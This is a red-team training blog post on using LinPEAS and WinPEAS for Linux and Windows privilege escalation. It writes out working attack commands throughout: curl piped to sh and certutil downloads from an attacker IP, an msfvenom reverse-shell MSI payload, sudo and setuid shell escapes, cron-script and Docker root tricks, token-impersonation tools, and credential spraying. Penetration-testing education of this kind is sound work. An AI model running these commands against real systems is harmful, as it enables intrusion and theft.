LinPEAS / WinPEAS: Let the Automation Find the Mistakes First

Series: The Community's Red Team

Post: 13 of 17

Tags: linpeas, winpeas, privilege escalation, post-exploitation, Linux, Windows, tools

Read time: ~11 min

Prerequisites: Post 12 — Metasploit, Post 11 — Netcat

You've got a shell. You're running as a low-privilege user. The goal is root or SYSTEM. The question is: where's the opening?

Privilege escalation is the art of finding misconfiguration — SUID binaries that shouldn't be SUID, cron jobs running writable scripts, sudo rules that let you run something dangerous, service accounts with excessive permissions. These mistakes are everywhere on real systems because they accumulate over years of configuration changes, developer shortcuts, and IT teams working under deadline pressure.

LinPEAS and WinPEAS (from the PEASS-ng project) are automated enumeration scripts that check for all of them. They run a comprehensive sweep of the machine, color-code the output by risk level, and surface the findings that would take you hours to check manually. They don't exploit anything — they find what to exploit.

This post covers deploying both tools, reading their output, and acting on what they find.

The Color System

Both tools use the same color convention. Learn this — it's how you triage hundreds of lines of output without reading every line:

• Red/Yellow — Critical: direct path to root/SYSTEM, check immediately

• Red — High value: probable escalation path

• Yellow — Interesting: worth investigating

• Green — Low severity, informational

In practice: scan for red/yellow entries first. Those are your attack surface. Green is background noise.

LinPEAS: Linux Privilege Escalation Awesome Script

Getting it onto the target

The cleanest method is serving it from your attack machine:

# Attack machine — serve linpeas
python3 -m http.server 80

# Target machine — download and execute
curl -L http://<your_ip>/linpeas.sh | sh

# Or download first, then run
wget http://<your_ip>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeas.txt

tee linpeas.txt saves the output while still printing to the terminal. Always save it — the scan takes a few minutes and you'll want to grep through it later.

If the target has no network access to your machine:

# Base64 encode on attack machine
base64 -w 0 linpeas.sh > linpeas.b64
cat linpeas.b64    # copy the output

# On target — paste and decode
echo "<base64_string>" | base64 -d > linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh

What LinPEAS checks

The script covers over 200 checks across:

• Current user context, sudo rights, groups

• SUID/SGID binaries

• Linux capabilities (cap_setuid, cap_dac_override)

• Cron jobs and scheduled tasks

• Writable files and directories owned by root

• PATH environment abuse

• Kernel version and CVE suggestions

• Credential hunting (config files, history files, SSH keys)

• Network services running internally

• NFS exports with no_root_squash

• Docker/LXD group membership

• Password hashes in /etc/shadow access

High-value Linux findings and what to do

Sudo rights with NOPASSWD:

(ALL) NOPASSWD: /usr/bin/vim

Check GTFOBins (gtfobins.github.io) immediately. vim, find, awk, python, perl, less, more — almost every common binary has a shell escape. sudo vim -c ':!/bin/bash' is often all it takes.

SUID binary not in the standard set:

-rwsr-xr-x 1 root root /usr/local/bin/backup

Standard SUID binaries are /bin/su, /usr/bin/passwd, /usr/bin/sudo. Anything custom in /opt/, /home/, or with an unusual name — check GTFOBins, then run strings on it to understand what it does.

Capabilities:

/usr/bin/python3.8 = cap_setuid+ep

cap_setuid lets a binary change its UID. python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' drops you to root.

Writable cron script:

* * * * * root /opt/scripts/backup.sh

If you can write to /opt/scripts/backup.sh, append chmod +s /bin/bash and wait 60 seconds. Then /bin/bash -p gives you a root shell.

Credentials in files:

/var/www/html/config.php: $db_pass = 'Sup3rS3cr3t!'

Spray that password against SSH, sudo, other users, anything.

Docker group membership:

uid=1000(user) gid=1000(user) groups=1000(user),998(docker)

Docker group is effectively root access. docker run -v /:/mnt --rm -it alpine chroot /mnt sh mounts the host filesystem and gives you a root shell.

The order of operations

1. Run linpeas → save output
2. Grep for red/yellow → identify candidates
3. sudo -l → check manually (fastest win)
4. SUID binaries → check each against GTFOBins
5. Capabilities → check cap_setuid, cap_dac_override
6. Cron jobs → check for writable scripts
7. Credential files → test everywhere
8. Kernel CVEs → last resort (noisy, may crash)

WinPEAS: Windows Privilege Escalation Awesome Script

The Windows equivalent. Same color system, same philosophy — sweep everything, surface the critical findings first.

Getting it onto the target

From your attack machine (Python HTTP server):

python3 -m http.server 80

On the Windows target:

:: CMD — certutil download
certutil -urlcache -split -f http://<your_ip>/winpeas.exe winpeas.exe

:: PowerShell download
(New-Object System.Net.WebClient).DownloadFile('http://<your_ip>/winpeas.exe','C:\Windows\Temp\winpeas.exe')
iwr http://<your_ip>/winpeas.exe -OutFile C:\Windows\Temp\winpeas.exe

Run it:

winpeas.exe > winpeas.txt 2>&1

Or for terminal color output (shows the red/yellow in the shell):

winpeas.exe color

What WinPEAS checks

• Current user privileges (whoami /priv) — token impersonation rights

• Unquoted service paths

• Weak service permissions

• AlwaysInstallElevated registry keys

• Stored credentials (registry, Windows Credential Manager)

• Autologon credentials in registry

• Scheduled tasks running as SYSTEM with writable paths

• DLL hijacking opportunities

• SAM/SYSTEM file accessibility

• Active network connections and internal services

• Installed software and versions

• Sensitive files (web.config, connection strings, private keys)

High-value Windows findings and what to do

SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege:

SeImpersonatePrivilege    Impersonate a client after authentication    Enabled

These are the token impersonation privileges. If you're running as a service account (IIS, MSSQL, network service), these are likely enabled. Exploit with PrintSpoofer, JuicyPotato, or GodPotato depending on OS version:

.\PrintSpoofer.exe -i -c cmd
.\GodPotato.exe -cmd "cmd /c whoami"

AlwaysInstallElevated:

AlwaysInstallElevated: 1
HKLM AlwaysInstallElevated: 1

Both registry keys set to 1 means any MSI runs as SYSTEM. Generate a malicious MSI with msfvenom and execute it:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=4444 -f msi -o shell.msi

msiexec /quiet /qn /i shell.msi

Unquoted service path:

C:\Program Files\My Service\bin\service.exe

If the path has spaces and isn't quoted, Windows searches C:\Program.exe, then C:\Program Files\My.exe before the real path. Drop a malicious binary at an earlier position to intercept execution on service restart.

Weak service permissions:

[+] Service: WeakSvc -> Modify permissions

If you can modify the service binary path, replace it with a payload and restart the service.

Autologon credentials:

DefaultUsername: Administrator
DefaultPassword: Password123!

Autologon stores credentials in plaintext registry entries. Test them against everything.

Stored credentials:

Currently stored credentials:
    Target: Domain:interactive=INLANEFREIGHT\administrator
    Type: Domain Password
    User: INLANEFREIGHT\administrator

Use runas /savecred to execute as that user, or extract with cmdkey /list.

Manual Checks to Always Run Alongside PEAS

PEAS finds most things but not everything. These manual checks take seconds and catch things the scripts miss:

Linux

sudo -l                              # sudo rights
id                                   # groups (docker, lxd, adm, disk)
cat /etc/crontab                     # cron jobs
find / -user root -perm -4000 2>/dev/null   # SUID
getcap -r / 2>/dev/null              # capabilities
cat ~/.bash_history                  # credential leaks
netstat -tulpn | grep LISTEN         # internal services

Windows

whoami /all                          :: privileges and group memberships
whoami /priv                         :: token privileges
net localgroup administrators        :: local admin members
systeminfo                           :: OS version, patches
wmic qfe                             :: installed patches (patch gaps = CVE opportunities)
netstat -ano                         :: active connections and listening ports

Quick Reference

# Serve LinPEAS from attack machine
python3 -m http.server 80

# Download and run on Linux target
curl -L http://<your_ip>/linpeas.sh | sh
wget http://<your_ip>/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh | tee linpeas.txt

# Base64 transfer (no network)
base64 -w 0 linpeas.sh > linpeas.b64    # encode
echo "<b64>" | base64 -d > linpeas.sh  # decode on target

# Download WinPEAS on Windows target
certutil -urlcache -split -f http://<your_ip>/winpeas.exe winpeas.exe
iwr http://<your_ip>/winpeas.exe -OutFile winpeas.exe

# Run WinPEAS
winpeas.exe > winpeas.txt 2>&1
winpeas.exe color    # terminal color output

# Key manual checks — Linux
sudo -l
find / -user root -perm -4000 2>/dev/null
getcap -r / 2>/dev/null
cat /etc/crontab

# Key manual checks — Windows
whoami /priv
wmic qfe

What's Next

With PEAS identifying the attack surface, Post 14 (Impacket) covers the Windows protocol toolkit — the Python suite that handles everything from remote code execution and hash dumping to Kerberoasting and DCSync from your Linux attack machine. It's the bridge between having credentials and owning the Windows environment.

MeshForge — Training the Community's Red Team

They count on your ignorance. The exploit only works on the uninformed.